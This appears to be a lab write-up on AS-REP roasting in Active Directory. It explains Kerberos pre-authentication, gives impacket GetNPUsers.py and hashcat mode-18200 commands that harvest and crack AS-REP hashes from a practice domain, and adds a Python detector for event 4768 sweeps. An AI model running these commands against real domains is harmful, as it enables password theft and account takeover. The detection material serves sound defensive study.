ASREP-Roast
Attack that finds accounts with the setting "Does not require Kerberos preauthentication" (it lets the account request a TGT without first authenticating to the KDC) and captures the AS-REP messages, which carry the TGT, for offline cracking.
Kerberos pre-authentication is the step in which the client proves knowledge of its key before the KDC answers the AS-REQ. Without it, "when a client sends an Authentication Service request, the client's User Principal Name (UPN) is included in the request with not much additional verification data. The KDC checks if the UPN exists in its database. If so, the KDC sends back an Authentication Service reply including a Ticket Granting ticket." https://www.linkedin.com/pulse/kerberos-pre-auth-one-checkbox-can-mean-lot-darryl
Using the GetNPUsers.py tool from impacket and passing a list of known-valid users, we can check which of those accounts are affected:
➧ cat users_valid.txt
james@spookysec.local
[...]
➧ python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile users_valid.txt -dc-ip 10.10.253.172 -format hashcat -outputfile users_asreproastables.txt 'spookysec.local/'
➧ hashcat -a 0 -m 18200 users_asreproastables.txt /usr/share/wordlists/rockyou.txt -o users_asreproastables.txt.cracked
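On the detection side, the requests above leave Windows Security event 4768 (a TGT was requested) on the domain controller with Pre-Authentication Type 0 and, for the hashcat 18200 case, Ticket Encryption Type 0x17 (RC4-HMAC). The following added example (not part of the original note) parses constructed, simplified 4768 export lines, lists the accounts that received a TGT without pre-authentication, and flags a source that pulled several of them, the pattern a user-list sweep produces; the account names, realm and addresses are invented.

```python
import re
from collections import Counter

# Constructed, simplified 4768 export (field names follow the Windows event schema;
# accounts, realm and IPs are invented for this example).
SAMPLE_4768 = """\
EventID=4768 TargetUserName=james TargetDomainName=EXAMPLE.LOCAL IpAddress=::ffff:10.10.14.5 TicketEncryptionType=0x17 PreAuthType=0 Status=0x0
EventID=4768 TargetUserName=svc-admin TargetDomainName=EXAMPLE.LOCAL IpAddress=::ffff:10.10.14.5 TicketEncryptionType=0x17 PreAuthType=0 Status=0x0
EventID=4768 TargetUserName=robin TargetDomainName=EXAMPLE.LOCAL IpAddress=::ffff:10.10.14.5 TicketEncryptionType=0x12 PreAuthType=2 Status=0x0
EventID=4768 TargetUserName=legacy-app TargetDomainName=EXAMPLE.LOCAL IpAddress=::ffff:10.10.1.20 TicketEncryptionType=0x12 PreAuthType=0 Status=0x0
EventID=4768 TargetUserName=ghost TargetDomainName=EXAMPLE.LOCAL IpAddress=::ffff:10.10.14.5 TicketEncryptionType=0x17 PreAuthType=0 Status=0x6
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_events(text):
    """Turn each key=value line into a dict keyed by the 4768 field names."""
    return [dict(FIELD_RE.findall(line)) for line in text.splitlines() if line.strip()]


def asrep_roast_candidates(events):
    """Return (account, source_ip, etype) for every TGT actually issued without pre-auth."""
    hits = []
    for e in events:
        if e.get("EventID") != "4768" or e.get("Status") != "0x0":
            continue  # not a TGT request, or the KDC refused (e.g. 0x6 = unknown principal)
        if e.get("PreAuthType") != "0":
            continue  # 0 means "logon without pre-authentication"; anything else proved the key
        hits.append((e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"]))
    return hits


def summarize(events, threshold=2):
    """Accounts to fix (clear DONT_REQ_PREAUTH), RC4 ones first, plus sources sweeping many of them."""
    hits = asrep_roast_candidates(events)
    per_source = Counter(ip for _, ip, _ in hits)
    return {
        "no_preauth_accounts": sorted({user for user, _, _ in hits}),
        "rc4_accounts": sorted({user for user, _, et in hits if et.lower() == "0x17"}),
        "noisy_sources": sorted(ip for ip, n in per_source.items() if n >= threshold),
    }


if __name__ == "__main__":
    for key, value in summarize(parse_events(SAMPLE_4768)).items():
        print(f"{key}: {value}")
```

Accounts in `rc4_accounts` are the ones whose AS-REP the mode-18200 command above would crack; the durable fix is clearing the pre-authentication exemption on each listed account rather than tuning the alert.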